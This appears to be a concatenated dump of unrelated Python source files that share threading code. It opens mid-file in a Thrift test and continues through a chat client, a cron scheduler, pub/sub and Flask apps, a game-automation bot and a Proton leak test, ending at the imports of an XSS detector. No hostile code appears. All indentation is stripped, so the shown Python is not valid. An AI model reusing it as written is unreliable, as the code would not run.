t.setDaemon(True)
t.start()
return (server, port)
def create_client(port):
socket = TSocket.TSocket("localhost", port)
protocol = THeaderProtocol.THeaderProtocol(socket)
protocol.trans.set_max_frame_size(MAX_BIG_FRAME_SIZE)
protocol.trans.open()
return ThriftTest.Client(protocol)
class BigFrameTest(unittest.TestCase):
def testBigFrame(self):
server, port = create_server()
with create_client(port) as client:
result = client.testString('a')
self.assertEqual(len(result), 2**30)
|
c.py | import sys, socket, select, threading
def prompt(user) :
sys.stdout.write('%s> ' % user)
sys.stdout.flush()
if __name__ == "__main__":
if len(sys.argv) < 3:
print('Usage : python %s user host' % sys.argv[0])
sys.exit()
(user, host), port = sys.argv[1:3], 5001
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try :
server_sock.connect((host, port))
except :
print('Unable to connect')
sys.exit()
print('Start')
def listen():
while True:
read_sockets, write_sockets, error_sockets = select.select([server_sock], [], [])
try:
data = server_sock.recv(4096).decode()
except:
break
sys.stdout.write('\r%s\n' % data)
prompt(user)
print('\rTerminated')
t = threading.Thread(target=listen)
t.start()
prompt(user)
while True:
msg = sys.stdin.readline().strip()
if not msg:
server_sock.close()
break
try:
server_sock.send(('%s| %s' % (user, msg)).encode())
except:
break
prompt(user)
|
Scheduler.py | from CronMatch import cron_match
from datetime import datetime
from time import sleep
from threading import Thread
from threading import Lock
from threading import Event
class Scheduler:
_running = False
_entries = []
_last_tick = None
_tick_thread = None
_lock = None
fn = None
_exit = None
def __init__(self):
self._lock = Lock()
self.start()
def load_cron(self, cron, fn):
with self._lock:
entries = cron.split('\n')
for e in entries:
self._entries.append((e, fn))
def stop(self):
with self._lock:
if self._running:
self._exit.set()
self._running = False
self._tick_thread = None
def start(self):
with self._lock:
if self._running is False:
self._tick_thread = Thread(target=self._tick)
self._exit = Event()
self._running = True
self._tick_thread.start()
def _check_cron(self):
with self._lock:
for entry in self._entries:
cron = entry[0]
fn = entry[1]
match = cron_match(cron)
if match is not False:
fn(match)
def _trim_datetime(self, dt = None):
if dt is None:
dt = datetime.now()
return datetime(dt.year, dt.month, dt.day, dt.hour, dt.minute, 0, 0)
def _tick(self):
while self._running:
t = datetime.utcnow()
rem = t.second + (t.microsecond / 1000000)
self._exit.wait(60.001 - rem)
# Make extra sure that we don't continue twice in the same minute
while self._trim_datetime() == self._last_tick:
self._exit.wait(.1)
if self._running is False:
break
self._last_tick = self._trim_datetime()
self._check_cron()
self._running = False
self._exit = None |
async_batch_builder.py | # Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <chrisc.101@gmail.com>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines a class for asynchronously reading a batch builder."""
import time
from threading import Thread
from typing import List
from absl import logging
from ncc.models.dataflow.base_batch_builder import BaseBatchBuilder
from ncc.models.dataflow.batch_data import BatchData
from ncc import LOGGER
try:
from third_party.programl.programl.util.py import humanize
except ImportError as err:
LOGGER.warning(err)
from third_party.download import download
download('programl')
class AsyncBatchBuilder(object):
"""A class for running a batch builder in a background thread.
An AsyncBatchBuilder runs a batch builder in the background until completion,
storing the generated batches in an in-memory list. Use this class to
construct a bunch of batches in the background while you are busy doing
something else. For example:
bb = AsyncBatchBuilder(MyBatchBuilder(my_graph_loader))
# ... do some busywork
for batch in bb.batches:
# go nuts!
Because the batches are loaded into a plain python list, this also provides
a convenient means for reusing a set of batches. For example, to always
use the same set of batches during validation runs of a model:
val_batches = AsyncBatchBuilder(batch_builder)
for epoch in range(10):
# ... train model, val_batches are loading in the background
model.RunBatch(val_batches.batches)
"""
def __init__(self, batch_builder: BaseBatchBuilder):
self._batches = []
self._worker = Thread(target=lambda: self._Worker(batch_builder))
self._worker.start()
def _Worker(self, batch_builder: BaseBatchBuilder):
start = time.time()
self._batches = list(batch_builder)
logging.debug(
"Async batch loader completed. %s batches loaded in %s",
humanize.Commas(len(self._batches)),
humanize.Duration(time.time() - start),
)
@property
def batches(self) -> List[BatchData]:
"""Access the batches. Blocks until all batches are built."""
self._worker.join()
return self._batches
|
base.py | """
Copyright 2019 EUROCONTROL
==========================================
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==========================================
Editorial note: this license is an instance of the BSD license template as provided by the Open Source Initiative:
http://opensource.org/licenses/BSD-3-Clause
Details on EUROCONTROL: http://www.eurocontrol.int
"""
import logging.config
import threading
from typing import Optional, List, Callable, Type
from proton.reactor import Container
from swim_pubsub.core.clients import PubSubClient
from swim_pubsub.core import ConfigDict
from swim_pubsub.core.errors import AppError, PubSubClientError
from swim_pubsub.core.broker_handlers import BrokerHandler
from swim_pubsub.core import utils
__author__ = "EUROCONTROL (SWIM)"
class _ProtonContainer:
def __init__(self, handler: Optional[BrokerHandler] = None) -> None:
"""
A `proton.Container` extension allowing threaded running.
:param handler:
"""
self._handler: BrokerHandler = handler
self._thread: Optional[threading.Thread] = None
def is_running(self):
"""
Determines whether the container is running by checking the handler and the underlying thread if it's running in
threaded mode.
:return:
"""
if self._thread:
return self._handler.started and self._thread.is_alive()
else:
return self._handler.started
def run(self, threaded: bool = False):
"""
Runs the container in threaded or not mode
:param threaded:
:return:
"""
if threaded and not self.is_running():
self._thread = threading.Thread(target=self._run)
self._thread.daemon = True
return self._thread.start()
return self._run()
def _run(self):
"""
The actual runner
"""
self._container = Container(self._handler)
self._container.run()
class App(_ProtonContainer):
def __init__(self, handler: BrokerHandler):
"""
A `_ProtonContainer` extension which acts like an app by keeping track of:
- the running of the contaner.
- the clients (publishers, subscribers) using it.
- any actions to be run before the actual run of the container.
:param handler:
"""
super().__init__(handler=handler)
self._handler: BrokerHandler = handler
self._before_run_actions: List[Callable] = []
self.config: Optional[ConfigDict] = None
self.clients: List[PubSubClient] = []
def before_run(self, f: Callable):
"""
Decorator to be used on any action that needs to be run before starting the application. The actions will be run
in FIFO mode.
Usage:
>>> handler = BrokerHandler()
>>> app = App(handler)
>>>
>>> @app.before_run
>>> def action():
>>> print("Before run")
>>>
>>> app.run()
"""
if not callable(f):
raise AppError(f'{f} is not callable')
self._before_run_actions.append(f)
def run(self, threaded: bool = False):
"""
Overrides the container run by running first any registered as 'before_run' action.
:param threaded:
"""
for action in self._before_run_actions:
action()
super().run(threaded=threaded)
def register_client(self, username: str, password: str, client_class: Type[PubSubClient] = PubSubClient):
"""
Creates a new client (publisher, subscriber) that will be using this app.
:param username:
:param password:
:param client_class:
:return:
"""
if client_class != PubSubClient:
if PubSubClient not in client_class.__bases__:
raise PubSubClientError(f"client_class should be PubSubClient or should inherit from PubSubClient")
client = client_class.create(self._handler, self.config['SUBSCRIPTION-MANAGER'], username, password)
if not client.is_valid():
raise PubSubClientError(f"User '{username}' is not valid")
self.clients.append(client)
return client
def remove_client(self, client: PubSubClient):
try:
self.clients.remove(client)
except ValueError:
raise AppError(f"PubSubClient {client} was not found")
@classmethod
def _create_from_config(cls, config_file: str, broker_handler_class: Type[BrokerHandler]):
"""
Entry point for creating an App()
First it parses the config file and then initializes accordingly the BrokerHandler.
:param config_file: the path of the config file
:param broker_handler_class:
"""
config = utils.yaml_file_to_dict(config_file)
handler = broker_handler_class.create_from_config(config['BROKER'])
app = cls(handler)
app.config = config
# configure logging
if 'LOGGING' in app.config:
logging.config.dictConfig(app.config['LOGGING'])
return app
|
photo_import.py | import threading
from gi.repository import GLib
from gi.repository import Gtk
class ImportOptions(Gtk.ListBox):
def __init__(self):
super(ImportOptions, self).__init__()
self.set_selection_mode(Gtk.SelectionMode.NONE)
copy_photo_row = Gtk.ListBoxRow()
copy_photo_box = Gtk.Box(
orientation=Gtk.Orientation.HORIZONTAL, spacing=50)
copy_photo_label = Gtk.Label(
"Copy Photos to Library",
xalign=0,
halign=Gtk.Align.END
)
copy_photo_label.set_halign(Gtk.Align.END)
copy_photo_checkbox = Gtk.CheckButton()
copy_photo_checkbox.set_active(True)
copy_photo_box.pack_start(copy_photo_label, True, True, 0)
copy_photo_box.pack_end(copy_photo_checkbox, False, True, 0)
copy_photo_row.add(copy_photo_box)
self.add(copy_photo_row)
copy_photo_checkbox.connect('toggled', self.copy_toggled)
self.delete_photo_row = Gtk.ListBoxRow()
delete_photo_box = Gtk.Box(
orientation=Gtk.Orientation.HORIZONTAL, spacing=50)
delete_photo_label = Gtk.Label(
"Delete Originals After Import",
xalign=0,
halign=Gtk.Align.END
)
self.delete_photo_checkbox = Gtk.CheckButton()
delete_photo_box.pack_start(delete_photo_label, True, True, 0)
delete_photo_box.pack_end(self.delete_photo_checkbox, False, True, 0)
self.delete_photo_row.add(delete_photo_box)
self.add(self.delete_photo_row)
self.delete_photo_checkbox.connect('toggled', self.delete_toggled)
self.options = {
'copy_photos': True,
'delete_originals': False,
}
def copy_toggled(self, button):
if button.get_active():
self.delete_photo_row.set_sensitive(True)
self.options['copy_photos'] = True
else:
self.delete_photo_row.set_sensitive(False)
self.delete_photo_checkbox.set_active(False)
self.options['copy_photos'] = False
self.options['delete_originals'] = False
def delete_toggled(self, button):
if button.get_active():
self.options['delete_originals'] = True
else:
self.options['delete_originals'] = False
def run(self):
return (super(ImportOptions, self).run(), self.options)
class PhotoImporter(Gtk.FileChooserDialog):
def __init__(self, window):
super(PhotoImporter, self).__init__(
'Choose folder to import',
window,
Gtk.FileChooserAction.SELECT_FOLDER,
(
Gtk.STOCK_CANCEL,
Gtk.ResponseType.CANCEL,
'Select',
Gtk.ResponseType.OK,
),
)
options_box = ImportOptions()
self.options = options_box.options
box = self.get_content_area()
box.set_spacing(3)
box.pack_start(options_box, True, True, 0)
box.show_all()
self._window = window
def import_photos(self):
response = self.run()
if response == Gtk.ResponseType.OK:
filename = self.get_filename()
else:
filename = None
if filename and response == Gtk.ResponseType.OK:
def do_import():
GLib.idle_add(self._window.import_button.set_sensitive, False)
GLib.idle_add(self._window.export_button.set_sensitive, False)
GLib.idle_add(self._window.progress.set_fraction, 0)
GLib.idle_add(
self._window.header_bar.pack_start, self._window.progress)
GLib.idle_add(self._window.show_all)
def imported(photo_hash, percent):
GLib.idle_add(self._window.progress.set_fraction, percent)
def notify_progress(photo_name):
GLib.idle_add(self._window.progress.set_text, photo_name)
self._window.library.import_photos(
filename, notify_callback=notify_progress,
imported_callback=imported,
copy_photos=self.options['copy_photos'],
delete_originals=self.options['delete_originals'])
GLib.idle_add(self._window.import_button.set_sensitive, True)
GLib.idle_add(self._window.export_button.set_sensitive, True)
GLib.idle_add(
self._window.header_bar.remove, self._window.progress)
GLib.idle_add(
self._window.render_selection, self._window.library.update(
self._window.selection
)
)
thread = threading.Thread(target=do_import)
thread.daemon = True
thread.start()
self.destroy()
|
test_PROTON_2116_blocking_connection_object_leak.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License
#
"""
PROTON-2116 Memory leak in python client
PROTON-2192 Memory leak in Python client on Windows
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import logging
import os
import platform
import subprocess
import sys
import threading
import time
import unittest
import uuid
import proton.handlers
import proton.reactor
import proton.utils
logger = logging.getLogger(__name__)
class ReconnectingTestClient:
def __init__(self, hostport):
# type: (str) -> None
self.hostport = hostport
self.object_counts = []
self.done = threading.Event()
def count_objects(self, message):
# type: (str) -> None
gc.collect()
n = len(gc.get_objects())
if message == "loop":
self.object_counts.append(n)
logger.debug("Message %s, Count %d", message, n)
def run(self):
ADDR = "testing123"
HEARTBEAT = 5
SLEEP = 5
recv = None
conn = None
for _ in range(3):
subscribed = False
while not subscribed:
try:
conn = proton.utils.BlockingConnection(self.hostport, ssl_domain=None, heartbeat=HEARTBEAT)
recv = conn.create_receiver(ADDR, name=str(uuid.uuid4()), dynamic=False, options=None)
subscribed = True
except Exception as e:
logger.info("received exception %s on connect/subscribe, retry", e)
time.sleep(0.5)
self.count_objects("loop")
logger.debug("connected")
while subscribed:
try:
recv.receive(SLEEP)
except proton.Timeout:
pass
except Exception as e:
logger.info(e)
try:
recv.close()
recv = None
except:
self.count_objects("link close() failed")
pass
try:
conn.close()
conn = None
self.count_objects("conn closed")
except:
self.count_objects("conn close() failed")
pass
subscribed = False
self.done.set()
class Proton2116Test(unittest.TestCase):
@unittest.skipIf(platform.system() == 'Windows', "PROTON-2192: The issue is not resolved on Windows")
def test_blocking_connection_object_leak(self):
"""Kills and restarts broker repeatedly, while client is reconnecting.
The value of `gc.get_objects()` should not keep increasing in the client.
These are the automated reproduction steps for PROTON-2116"""
gc.collect()
thread = None
client = None
host_port = "" # random on first broker startup
broker_process = None
while not client or not client.done.is_set():
try:
params = []
if host_port:
params = ['-b', host_port]
cwd = os.path.dirname(__file__)
broker_process = subprocess.Popen(
args=[sys.executable,
os.path.join(cwd, 'broker_PROTON_2116_blocking_connection_object_leak.py')] + params,
stdout=subprocess.PIPE,
universal_newlines=True,
)
host_port = broker_process.stdout.readline()
if not client:
client = ReconnectingTestClient(host_port)
thread = threading.Thread(target=client.run)
thread.start()
time.sleep(3)
finally:
if broker_process:
broker_process.kill()
broker_process.wait()
broker_process.stdout.close()
time.sleep(0.3)
thread.join()
logger.info("client.object_counts:", client.object_counts)
# drop first value, it is usually different (before counts settle)
object_counts = client.object_counts[1:]
diffs = [c - object_counts[0] for c in object_counts]
self.assertEqual([0] * 2, diffs, "Object counts should not be increasing")
if __name__ == '__main__':
unittest.main()
|
search_url_tweets.py | """
Iteratively search for tweets containing one of the URLs on in $TWNEWS_DATA/urls.tsv.
Store the result in $TWNEWS_DATA/tweets.json.
Each tweet json is modified to include two new fields:
- url_query: the url (from balance.org) submitted as a search query
- url_score: the score for that url (from balance.org)
Queries are submitted in order, and the script loops forever. When rate limit
is hit, it sleeps for 5 minutes before continuing.
Note that this will introduce duplicates, which should be filtered downstream.
"""
import codecs
import json
#from multiprocessing import Process, Queue
from threading import Thread
from Queue import Queue
import time
import sys
import traceback
import twutil
from . import __data__
from .balance import load_balance_scores
def do_search(qu, url, score, count=100, result_type='recent'):
domain = url[7:]
while True:
try:
result = twutil.collect.twapi.request('search/tweets', {'q': domain, 'count': count, 'result_type': 'recent'})
if result.status_code == 200:
tweets = []
for tweet in result:
tweet['url_query'] = url
tweet['url_score'] = score
tweets.append(tweet)
qu.put(tweets)
return
elif result.status_code in [88, 130, 420, 429]:
print 'Sleeping off error: ', result.text
time.sleep(300)
else:
sys.stderr.write('Error for %s: %s' % (domain, result.text))
qu.put(None)
return
except:
e = sys.exc_info()
sys.stderr.write('skipping error %s\n%s' % (str(e[0]), traceback.format_exc()))
return
def search_for_tweets(scores, fname=__data__ + '/tweets.json'):
out = codecs.open(fname, 'a', 'utf-8')
qu = Queue()
while True:
for url, score in scores.iteritems():
p = Thread(target=do_search, args=(qu, url, score))
p.start()
p.join(900)
if p.is_alive():
print 'no results after 15 minutes for', url, '. continuing.'
else:
results = qu.get()
if results:
print 'found', len(results), 'for domain', url
for tweet in results:
out.write(json.dumps(tweet) + '\n')
time.sleep(2)
if __name__ == '__main__':
scores = load_balance_scores()
search_for_tweets(scores)
|
runserver.py | #!/usr/bin/env python
from multiprocessing import Process
import subprocess
import os
import configparser
_conf = configparser.ConfigParser()
_conf.read('src/deploy.conf')
OutIp = _conf.get('host', 'ipaddress')
BASEPATH = os.path.dirname(os.path.abspath(__file__))
def startdjango():
os.chdir(os.path.join(BASEPATH, 'src'))
subprocess.call('python3 manage.py runserver 0.0.0.0:8000', shell=True)
def startnode():
os.chdir(os.path.join(BASEPATH, 'webpage'))
subprocess.call('npm run dev', shell=True)
def main():
print('请访问%s'%OutIp)
django = Process(target=startdjango, args=())
node = Process(target=startnode, args=())
django.start()
node.start()
django.join()
node.join()
if __name__ == "__main__":
main()
|
fgoFunc.py | # Stars Cosmos Gods Animus Antrum Unbirth Anima Animusphere
# 星の形.宙の形.神の形.我の形.天体は空洞なり.空洞は虚空なり.虚空には神ありき.
# 地を照らし,空に在り,天上の座標を示せ.
# カルディアの灯よ.
# どうか今一度,旅人の標とならん事を.
# ここで,Bgo運営の敗北を宣言する!
# . OO---O---O-o\
# . // \ / \ / \ \\
# . OO O O O \\
# . // \ \ / / \ \\
# . oO---O---O---O---O-Oo
# . \\ / / \ \ / //
# . \O O O O //
# . \\ / \ / \ / //
# . oO---O---Oo-O
# . ^^
# . Grand Order/Anima Animusphere
# . 冠位指定/人理保障天球
'Full-automatic FGO Script'
__author__='hgjazhgj'
__version__='v7.10.0'
import logging,re,time,numpy
from threading import Thread
from itertools import permutations
from fgoAndroid import Android
from fgoCheck import Check
from fgoControl import control,ScriptTerminate
from fgoFuse import fuse
from fgoImageListener import ImageListener
from fgoLogging import getLogger,logit
logger=getLogger('Func')
friendImg=ImageListener('fgoImage/friend/')
mailImg=ImageListener('fgoImage/mail/')
class Device(Android):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
Check.device=self
device=Device()
def guardian():
prev=None
while True:
if Check.cache is not prev and Check.cache.isNetworkError():
logger.warning('Reconnecting')
device.press('K')
prev=Check.cache
time.sleep(3)
Thread(target=guardian,daemon=True,name='Guardian').start()
def gacha():
while fuse.value<30:
if Check().isGacha():device.perform('MK',(200,2700))
device.press('\xBB')
def jackpot():
while fuse.value<50:
if Check().isNextJackpot():device.perform('\xDCKJ',(600,2400,500))
for _ in range(40):device.press('2')
def mailFiltering():
if not mailImg.flush():return
Check().setupMailDone()
while True:
while any((pos:=Check.cache.find(i[1],threshold=.016))and(device.touch(pos),True)[-1]for i in mailImg.items()):
while not Check().isMailDone():pass
device.swipe((400,900,400,300))
if Check().isMailListEnd():break
class Battle:
skillInfo=[[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]],[[0,0,0,7],[0,0,0,7],[0,0,0,7]]]
houguInfo=[[1,7],[1,7],[1,7],[1,7],[1,7],[1,7]]
masterSkill=[[0,0,0,7],[0,0,0,7],[0,0,0,0,7]]
def __init__(self):
Battle.friendInfo=[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]]
self.turn=0
self.stage=0
self.stageTurn=0
self.servant=[0,1,2]
self.orderChange=[0,1,2,3,4,5]
self.masterSkillReady=[True,True,True]
self.rainbowBox=False
def __call__(self):
while True:
if Check(0,.3).isTurnBegin():
self.turn+=1
self.stage,self.stageTurn=[t:=Check(.2).getStage(),1+self.stageTurn*(self.stage==t)]
self.friend=Check.cache.isServantFriend()
Check.cache.getHP(),Check.cache.getNP()
if self.turn==1:
Check.cache.setupServantDead(self.friend)
self.stageTotal=Check.cache.getStageTotal()
else:self.servant=(lambda m,p:[m+p.index(i)+1 if i in p else self.servant[i]for i in range(3)])(max(self.servant),(lambda dead:[i for i in range(3)if self.servant[i]<6 and dead[i]])(Check.cache.isServantDead(self.friend)))
logger.info(f'Turn {self.turn} Stage {self.stage} StageTurn {self.stageTurn} {self.servant}')
if self.stageTurn==1:device.perform('\x67\x68\x69'[numpy.argmax(Check.cache.getEnemyHP())]+'\xBB',(800,500))
while(s:=(lambda skill:[(self.getSkillInfo(i,j,3),0,(i,j))for i in range(3)if self.servant[i]<6 for j in range(3)if skill[i][j]and(t:=self.getSkillInfo(i,j,0))and min(t,self.stageTotal)<<8|self.getSkillInfo(i,j,1)<=self.stage<<8|self.stageTurn])(Check.cache.isSkillReady())+[(self.masterSkill[i][-1],1,i)for i in range(3)if self.masterSkillReady[i]and self.stage==min(self.masterSkill[i][0],self.stageTotal)and self.stageTurn==self.masterSkill[i][1]]):
_,cast,arg=min(s,key=lambda x:x[0])
if cast==0:
device.perform(('ASD','FGH','JKL')[arg[0]][arg[1]],(300,))
if t:=self.getSkillInfo(*arg,2):device.perform('234'[t-1],(300,))
elif cast==1:
self.masterSkillReady[arg]=False
device.perform('Q'+'WER'[arg],(300,300))
if self.masterSkill[arg][2]:
if arg==2 and self.masterSkill[2][3]:
if self.masterSkill[2][2]-1 not in self.servant or self.masterSkill[2][3]-1 in self.servant:
device.perform('\xBB',(300,))
continue
p=self.servant.index(self.masterSkill[2][2]-1)
device.perform(('TYUIOP'[p],'TYUIOP'[self.masterSkill[2][3]-max(self.servant)+1],'Z'),(300,300,2600))
self.orderChange[self.masterSkill[2][2]-1],self.orderChange[self.masterSkill[2][3]-1]=self.orderChange[self.masterSkill[2][3]-1],self.orderChange[self.masterSkill[2][2]-1]
control.sleep(2.3)
while not Check().isTurnBegin():pass
self.friend=Check(.5).isServantFriend()
Check.cache.setupServantDead(self.friend)
continue
device.perform('234'[self.masterSkill[arg][2]-1],(300,))
control.sleep(2.3)
while not Check().isTurnBegin():pass
Check(.5)
device.perform(' ',(2100,))
device.perform(self.selectCard(),(270,270,2270,1270,6000))
elif Check.cache.isSpecialDropSuspended():
control.checkKizunaReisou()
logger.warning('Kizuna Reisou')
Check.cache.save('fgoLog/SpecialDrop')
device.press('\x67')
elif not self.rainbowBox and Check.cache.isSpecialDropRainbowBox():self.rainbowBox=True
elif Check.cache.isBattleFinished():
logger.info('Battle Finished')
if self.rainbowBox:
control.checkSpecialDrop()
logger.warning('Special drop')
Check.cache.save('fgoLog/SpecialDrop')
return self.turn
elif Check.cache.isBattleDefeated():
logger.warning('Battle Defeated')
control.checkDefeated()
return 0
device.press('\xBB')
@logit(logger,logging.INFO)
def selectCard(self):return''.join((lambda hougu,sealed,color,resist,critical:['678'[i]for i in sorted((i for i in range(3)if hougu[i]),key=lambda x:self.getHouguInfo(x,1))]+['12345'[i]for i in sorted(range(5),key=(lambda x:-color[x]*resist[x]*(not sealed[x])*(1+critical[x])))]if any(hougu)else(lambda group:['12345'[i]for i in(lambda choice:choice+tuple({0,1,2,3,4}-set(choice)))(logger.debug('cardRank'+','.join((' 'if i%5 else'\n')+f'({j}, {k:5.2f})'for i,(j,k)in enumerate(sorted([(card,(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1)))for card in permutations(range(5),3)],key=lambda x:-x[1]))))or max(permutations(range(5),3),key=lambda card:(lambda colorChain,firstCardBonus:sum((firstCardBonus+[1.,1.2,1.4][i]*color[j])*(1+critical[j])*resist[j]*(not sealed[j])for i,j in enumerate(card))+(not any(sealed[i]for i in card))*(4.8*colorChain+(firstCardBonus+1.)*(3 if colorChain else 1.8)*(len({group[i]for i in card})==1)*resist[card[0]]))(len({color[i]for i in card})==1,.3*(color[card[0]]==1.1))))])(Check.cache.getCardGroup()))([self.servant[i]<6 and j and(t:=self.getHouguInfo(i,0))and self.stage>=min(t,self.stageTotal)for i,j in enumerate(Check().isHouguReady())],Check.cache.isCardSealed(),Check.cache.getCardColor(),Check.cache.getCardResist(),Check.cache.getCriticalRate()))
def getSkillInfo(self,pos,skill,arg):return self.friendInfo[0][skill][arg]if self.friend[pos]and self.friendInfo[0][skill][arg]>=0 else self.skillInfo[self.orderChange[self.servant[pos]]][skill][arg]
def getHouguInfo(self,pos,arg):return self.friendInfo[1][arg]if self.friend[pos]and self.friendInfo[1][arg]>=0 else self.houguInfo[self.orderChange[self.servant[pos]]][arg]
class Main:
teamIndex=0
def __init__(self,appleTotal=0,appleKind=0,battleClass=Battle):
self.appleTotal=appleTotal
self.appleKind=appleKind
self.battleClass=battleClass
self.appleCount=0
self.battleCount=0
def __call__(self):
while True:
self.battleFunc=self.battleClass()
while True:
if Check(.3,.3).isMainInterface():
device.press('8')
if Check(.7,.3).isApEmpty()and not self.eatApple():return
self.chooseFriend()
while not Check().isBattleBegin():pass
if self.teamIndex and Check.cache.getTeamIndex()+1!=self.teamIndex:device.perform('\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79'[self.teamIndex-1]+' ',(1000,400))
device.perform(' M',(800,10000))
break
elif Check.cache.isBattleContinue():
device.press('L')
if Check(.7,.3).isApEmpty()and not self.eatApple():return
self.chooseFriend()
control.sleep(6)
break
elif Check.cache.isTurnBegin():break
elif Check.cache.isAddFriend():device.perform('X',(300,))
elif Check.cache.isSpecialDropSuspended():device.perform('\x67',(300,))
device.press('\xBB')
self.battleCount+=1
logger.info(f'Battle {self.battleCount}')
if self.battleFunc():device.press(' ')
else:device.perform('BIK',(500,500,500))
control.checkTerminateLater()
@logit(logger,logging.INFO)
def eatApple(self):
if self.appleCount==self.appleTotal:return device.press('Z')
self.appleCount+=1
device.perform('W4K8'[self.appleKind]+'L',(400,1200))
return self.appleCount
@logit(logger,logging.INFO)
def chooseFriend(self):
refresh=False
while not Check(.2).isChooseFriend():
if Check.cache.isNoFriend():
if refresh:control.sleep(10)
device.perform('\xBAK',(500,1000))
refresh=True
if not friendImg.flush():return device.press('8')
while True:
timer=time.time()
while True:
for i in(i for i,j in friendImg.items()if(lambda pos:pos and(device.touch(pos),True)[-1])(Check.cache.find(j))):
Battle.friendInfo=(lambda r:(lambda p:([[[-1 if p[i*4+j]=='X'else int(p[i*4+j],16)for j in range(4)]for i in range(3)],[-1 if p[i+12]=='X'else int(p[i+12],16)for i in range(2)]]))(r.group())if r else[[[-1,-1,-1,-1],[-1,-1,-1,-1],[-1,-1,-1,-1]],[-1,-1]])(re.match('([0-9X]{3}[0-9A-FX]){3}[0-9X][0-9A-FX]$',i[-14:].upper()))
return i
if Check.cache.isFriendListEnd():break
device.swipe((800,900,800,300))
Check(.4)
if refresh:control.sleep(max(0,timer+10-time.time()))
device.perform('\xBAK',(500,1000))
refresh=True
while not Check(.2).isChooseFriend():
if Check.cache.isNoFriend():
control.sleep(10)
device.perform('\xBAK',(500,1000))
class UserScript:
def __call__(self):
while not Check(0,.3).isTurnBegin():device.press('\xBB')
# # BX WCBA 极地用迦勒底制服
# # A D F 2 G H 2 J 2 K L 2 Q E 2 _ 6 5 4
# device.perform('ADF2GH2J2KL2QE2 654',(3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,300,350,3000,2400,350,350,10000))
# # Hikari Nobu Kintoki wcba atorasu
# # Q E 2 A F 2 G H 2 J 2 K L 2 _ 6 5 4
# device.perform('QE2AF2GH2J2KL2 654',(300,350,3000,3000,350,3000,3000,350,3000,350,3000,3000,350,3000,2400,350,350,10000))
device.perform('QE2',(300,350,3000))
return Battle()()
|
__init__.py | from flask import Flask
from flask_migrate import Migrate
from . import file_monitor
import config
import threading
from .cache import cache
migrate = Migrate()
def create_app():
"""
Application factory method
"""
app = Flask(__name__)
# Add SQLAlchemy configuration to the app config
app.config['SQLALCHEMY_DATABASE_URI'] = config.SQLALCHEMY_DATABASE_URI
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = \
config.SQLALCHEMY_TRACK_MODIFICATIONS
# Initialize application extensions
from openbrain.models import db
db.init_app(app)
migrate.init_app(app, db)
cache.init_app(app)
# Register the app blueprints
from openbrain.settings.views import settings_bp
from openbrain.visualization.views import visualization_bp
from openbrain.plotting.views import plotting_bp
app.register_blueprint(settings_bp)
app.register_blueprint(visualization_bp)
app.register_blueprint(plotting_bp)
# Run file system monitor in a new thread
fs_thread = threading.Thread(target=file_monitor.run)
fs_thread.daemon = True
fs_thread.start()
return app
|
ReflectedXSSDetector.py | # coding:utf-8
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs, urlencode
import threading
import time
import base64
import html
import logging
from lib.exceptions import NoRequestsException
